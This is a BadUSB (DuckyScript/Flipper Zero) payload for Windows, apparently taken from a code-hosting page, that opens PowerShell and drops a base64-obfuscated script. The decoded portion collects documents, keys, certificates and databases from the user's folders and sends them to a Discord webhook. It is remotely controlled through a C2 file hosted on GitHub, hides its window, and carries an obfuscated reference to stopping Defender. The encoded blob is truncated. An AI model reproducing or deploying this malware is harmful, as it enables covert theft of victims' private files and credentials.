30 lines
15 KiB
Plaintext
30 lines
15 KiB
Plaintext
|
REM Title: C2 Data Exfiltration with File Splitter w Discord Webhook
|
||
|
|
REM Description: Finds all specified filetypes and zips them into a file and sends
|
||
|
|
REM to Discord Webhook. If the zip file is too large, split and send in chunks.
|
||
|
|
REM Supports 7zip filecombining. C2 is used to IDLE and ACTIVATE and KILL the
|
||
|
|
REM payload remotely. C2 File must be hosted on GitHub unless you know how to
|
||
|
|
REM modify the source. UberGuidoz and REDD (InfoSecREDD) are NOT responsible for
|
||
|
|
REM the misuse of this payload.
|
||
|
|
REM AUTHOR: InfoSecREDD
|
||
|
|
REM Version: 1.4.2
|
||
|
|
REM Category: Exfiltration (REMOTE)
|
||
|
|
REM Compatibility: Flipper Zero AND DuckyScript Devices
|
||
|
|
REM Target: Windows
|
||
|
|
|
||
|
|
REM To use on Flipper Zero REM the DUCKY_LANG US from line below
|
||
|
|
REM DUCKY_LANG US
|
||
|
|
DELAY 2000
|
||
|
|
GUI r
|
||
|
|
DELAY 500
|
||
|
|
STRING powershell
|
||
|
|
ENTER
|
||
|
|
DELAY 2000
|
||
|
|
REM Put your webhook below.
|
||
|
|
STRING $webhook = "DiscordWebhookHere";
|
||
|
|
REM C2 file must be hosted at GitHub unless you can edit the file. 1 = ON and 0 = OFF
|
||
|
|
STRING $ccontrol = "C2FileHere";
|
||
|
|
REM Put it all together now..
|
||
|
|
STRING $TempFile = "$env:TEMP\temp.ps1"; $File = "$env:TEMP\l.ps1"; echo IyBUaXRsZTogRGF0YSBFeGZpbHRyYXRpb24gLSBEaXNjb3JkDQojIERlc2NyaXB0aW9uOiBEYXRhIEV4ZmlsdHJhdGlvbiB0byBEaXNjb3JkIFdlYmhvb2sgd2l0aCBGaWxlIFNwbGl0dGVyLg0KIyBBVVRIT1I6IEluZm9TZWNSRUREDQojIFZlcnNpb246IDEuNC4yDQojIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIEludGVybmFsIFBheWxvYWQgSW5mb3JtYXRpb24NCg0KJGF1dGhvciA9ICJJbmZvU2VjUkVERCINCiRjb2RlbmFtZSA9ICJFeGVjdXRpb25lciINCiRpbnRfZGVzYyA9ICJEb250IHBhbmljIHdoZW4gaGVsbCBicmVha3MgbG9vc2UgYW5kIHdlIGFsbCBkaWUuIg0KJGhvc3RlZCA9ICJyYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tIg0KDQojIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFdyYXBwZXIgZm9yIFJFUEcgUmVwbyAtIFRvIGhlbHAgY2F0Y2ggaW5wcm9wZXIgdmFyaWFibGVzLiBETyBOT1QgVE9VQ0ggLSBNaWdodCBicmVhay4NCmlmICggJGNjb250cm9sIC1lcSAiQzJGaWxlSGVyZSIgLU9yICR3ZWJob29rIC1lcSAnJykgeyAkY2NvbnRyb2wgPSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0luZm9TZWNSRUREL2svbWFpbi9BUzlraEMzayIgfQ0KaWYgKCAkd2ViaG9vayAtZXEgIkRpc2NvcmRXZWJob29rSGVyZSIgLU9yICR3ZWJob29rIC1lcSAnJyApIHsgV3JpdGUtSG9zdCAiSW52YWxpZCBXZWJob29rLiBFeGl0aW5nIHRvIHByZXZlbnQgcHJvY2VzcyBmcm9tIHN0YXlpbmcgYWxpdmUuIjsgZXhpdCAxO30NCiMgLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgJHdlYmhvb2sgPSANCiMgJGNjb250cm9sID0NCg0KJHN0b3BEZWZlbmRlciA9ICJrIg0KJFJBTiA9IC1qb2luICgoNjUuLjkwKSArICg5Ny4uMTIyKSB8IEdldC1SYW5kb20gLUNvdW50IDggfCAlIHtbY2hhcl0kX30pDQokaW5pdFJhdyA9ICRpbnRfZGVzYyB8IE91dC1TdHJpbmcNCiRpbml0MlJhdyA9ICRjb2RlbmFtZSB8IE91dC1TdHJpbmcNCiRpbml0WCA9ICRhdXRob3INCiRhID0gJy8nDQokaiA9ICc6Jw0KJGRpcl9uYW1lID0gIiRSQU4iDQokZlJBTiA9ICJGa2pqRTM5c2sxayINCiR6ID0gJGluaXRSYXcuU3Vic3RyaW5nKDEyLDEpDQokeCA9ICRpbml0MlJhdy5TdWJzdHJpbmcoNSwxKQ0KJHkgPSAkaW5pdFJhdy5TdWJzdHJpbmcoNSwxKQ0KJHcgPSAkaW5pdFJhdy5TdWJzdHJpbmcoMjUsMSkNCiRwYXRoID0gIiRlbnY6dGVtcFwkZGlyX25hbWUiDQppZiAoIShUZXN0LVBhdGggIiRwYXRoIikpIA0Kew0KICBOZXctSXRlbSAiJHBhdGgiIC1JdGVtVHlwZSBEaXJlY3RvcnkgPiRudWxsIDI+JjENCn0NClNldC1Mb2NhdGlvbiAiJHBhdGgiDQpQdXNoLUxvY2F0aW9uICIkcGF0aCINCiRxID0gJGZSQU4NCiRleGZpbGZpbGVsaXN0ID0gImxpc3Rfb2ZfYWxsX2ZpbGVfbG9jYXRpb25zLnR4dCINCiRleGZpbGZvbGRlcnMgPSBAKCIkZW52OnVzZXJwcm9maWxlXERlc2t0b3AiLCIkZW52OnVzZXJwcm9maWxlXFBpY3R1cmVzIiwiJGVudjp1c2VycHJvZmlsZVxEb2N1bWVudHMiLCIkZW52OnVzZXJwcm9maWxlXERvd25sb2FkcyIsIiRlbnY6TG9jYWxBcHBEYXRhIiwiJGVudjpBcHBEYXRhIiwiJGVudjpwdWJsaWMiKQ0KJGV4dHMgPSBAKCJsb2ciLCJkYiIsInR4dCIsImRvYyIsInBkZiIsImpwZyIsImpwZWciLCJwbmciLCJ3ZG9jIiwieGRvYyIsImNlciIsImtleSIsInhscyIsInhsc3giLCJjZmciLCJjb25mIiwid3BkIiwicmZ0IikNCiRmID0gJGhvc3RlZA0KJHppcGZpbGUgPSAiLnppcCINCmlmIChUZXN0LVBhdGggIiRwYXRoXCRleGZpbGZpbGVsaXN0IikNCnsNCiAgUmVtb3ZlLUl0ZW0gIiRwYXRoXCRleGZpbGZpbGVsaXN0IiAtRm9yY2UgPiRudWxsIDI+JjENCn0NCiRyID0gJGluaXRYDQpOZXctSXRlbSAtUGF0aCAiJHBhdGgiIC1OYW1lICIkZXhmaWxmaWxlbGlzdCIgLUl0ZW1UeXBlIEZpbGUgPiRudWxsIDI+JjENCiRzaG93Zm9sZGVycyA9ICIkZXhmaWxmb2xkZXJzIg0KJGsgPSAiJHN0b3BEZWZlbmRlci9tYWluIg0KJGZvcm1hdGZvbGRlcnMgPSAkc2hvd2ZvbGRlcnMucmVwbGFjZSgnICcsJw0KJykNCiRpbml0U3RhcnR1cCA9ICIkciRhJGskYSRxIg0KJGluaXRNc2cgPSBAew0KICAndXNlcm5hbWUnID0gIiRlbnY6Q29tcHV0ZXJOYW1lIg0KICAnY29udGVudCcgPSAiPiBTdGFydGluZyBEb2N1bWVudCBFeGZpbHRyYXRlLi4NCg0KYGBgYCBUYXJnZXQgRmlsZSBFeHRlbnNpb25zIDoNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQokZXh0cyANCg0KICAgICBUYXJnZXQgRm9sZGVycyAgICAgOg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiRmb3JtYXRmb2xkZXJzIGBgYGAiDQp9DQokaWRsZU1zZyA9IEB7DQogICd1c2VybmFtZScgPSAiJGVudjpDb21wdXRlck5hbWUiDQogICdjb250ZW50JyA9ICI+ICRlbnY6Q29tcHV0ZXJuYW1lIGlzIHJlYWR5IGFuZCBpcyBzaXR0aW5nIElkbGUuIg0KfQ0KJGtpbGxNc2cgPSBAew0KICAndXNlcm5hbWUnID0gIiRlbnY6Q29tcHV0ZXJOYW1lIg0KICAnY29udGVudCcgPSAiPiBHbG9iYWwgUmVtb3RlIEtpbGxzd2l0Y2ggRU5BQkxFRCENCj4gS0lMTElORyBTY3JpcHQgb24gJGVudjpDb21wdXRlcm5hbWUiDQp9DQokcCA9ICIkeiR4JHgkeSRqIg0KJGkgPSAnW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXSBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFNob3dXaW5kb3coaW50IGhhbmRsZSwgaW50IHN0YXRlKTsnOw0KJERlZmF1bHRTdHIgPSAiJHAkYSRhJGYkYSINCmFkZC10eXBlIC1uYW1lIHdpbiAtbWVtYmVyICRpIC1uYW1lc3BhY2UgbmF0aXZlOw0KJGkgPSAiJERlZmF1bHRTdH
|
||
|
|
DELAY 1000
|
||
|
|
ENTER
|